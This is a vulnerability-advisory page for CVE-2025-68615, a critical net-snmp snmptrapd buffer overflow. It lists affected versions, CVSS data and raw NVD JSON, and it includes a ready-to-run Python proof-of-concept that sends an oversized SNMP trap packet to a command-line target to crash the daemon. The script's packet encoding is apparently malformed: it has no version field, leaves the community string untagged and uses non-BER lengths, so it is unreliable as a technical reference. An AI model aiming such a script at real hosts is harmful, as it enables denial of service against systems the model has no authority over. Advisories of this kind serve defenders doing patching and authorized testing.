Security Vulnerability Report
中文
CVE-2025-68615 CVSS 9.8 CRITICAL

CVE-2025-68615

Published: 2025-12-23 00:15:44
Last Modified: 2026-02-19 16:09:15
Source: [email protected]

Description

net-snmp is a SNMP application library, tools and daemon. Prior to versions 5.9.5 and 5.10.pre2, a specially crafted packet to an net-snmp snmptrapd daemon can cause a buffer overflow and the daemon to crash. This issue has been patched in versions 5.9.5 and 5.10.pre2.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:net-snmp:net-snmp:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:net-snmp:net-snmp:5.10:pre1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:* - VULNERABLE
net-snmp < 5.9.5
net-snmp < 5.10.pre2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-68615 PoC - net-snmp snmptrapd Buffer Overflow Note: This PoC is for educational and authorized testing purposes only. """ import socket import struct import sys def create_snmp_trap_packet(): """ Create a malformed SNMP Trap packet to trigger buffer overflow. This is a simplified example - actual exploit may require more sophisticated packet crafting. """ # SNMPv1 Trap PDU packet = b'\x30' # SEQUENCE # Community string (normal field) community = b'public' # Enterprise OID enterprise = b'\x06\x08\x2b\x06\x01\x04\x01\x01\x01' # Generic trap type generic_trap = b'\x00' # coldStart # Specific trap type specific_trap = b'\x00' # Timestamp timestamp = b'\x43\x01\x00\x00' # Variable bindings - intentionally malformed to trigger overflow # This creates an oversized varbind list varbind_data = b'\x41' * 10000 # Oversized data # Construct the trap PDU trap_pdu = b'\xa7' + struct.pack('!H', len(enterprise + generic_trap + specific_trap + timestamp + varbind_data)) trap_pdu += enterprise + generic_trap + specific_trap + timestamp + varbind_data # Community + Trap PDU data = community + trap_pdu # SNMP Message wrapper message = b'\x30' + struct.pack('!H', len(data)) message += data return message def send_exploit(target_ip, target_port=162): """ Send the exploit packet to target snmptrapd service. """ print(f"[*] Creating malicious SNMP Trap packet...") packet = create_snmp_trap_packet() print(f"[*] Packet size: {len(packet)} bytes") print(f"[*] Sending packet to {target_ip}:{target_port}...") try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(packet, (target_ip, target_port)) sock.close() print(f"[+] Packet sent successfully!") print(f"[!] Check if snmptrapd process crashed or became unresponsive") except Exception as e: print(f"[-] Error sending packet: {e}") return False return True if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") print(f"Example: {sys.argv[0]} 192.168.1.100 162") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 162 print(f"[*] CVE-2025-68615 PoC for net-snmp snmptrapd") print(f"[*] Target: {target}:{port}") send_exploit(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68615", "sourceIdentifier": "[email protected]", "published": "2025-12-23T00:15:43.830", "lastModified": "2026-02-19T16:09:15.480", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "net-snmp is a SNMP application library, tools and daemon. Prior to versions 5.9.5 and 5.10.pre2, a specially crafted packet to an net-snmp snmptrapd daemon can cause a buffer overflow and the daemon to crash. This issue has been patched in versions 5.9.5 and 5.10.pre2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:net-snmp:net-snmp:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.9.5", "matchCriteriaId": "FE255386-78E6-4FA6-87E8-46F2A6D22756"}, {"vulnerable": true, "criteria": "cpe:2.3:a:net-snmp:net-snmp:5.10:pre1:*:*:*:*:*:*", "matchCriteriaId": "D719AF88-2E6A-45BB-AF4B-A51E853DFEEA"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED"}]}]}], "references": [{"url": "https://github.com/net-snmp/net-snmp/security/advisories/GHSA-4389-rwqf-q9gq", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/09/2", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}, {"url": "https://lists.debian.org/debian-lts-announce/2026/01/msg00000.html", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Vendor Advisory", "Mailing List"]}, {"url": "https://www.vicarius.io/vsociety/posts/cve-2025-68615-detection-script-buffer-overflow-vulnerability-affecting-net-snmp", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mitigation", "Third Party Advisory", "Exploit"]}, {"url": "https://www.vicarius.io/vsociety/posts/cve-2025-68615-mitigation-script-buffer-overflow-vulnerability-affecting-net-snmp", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mitigation", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.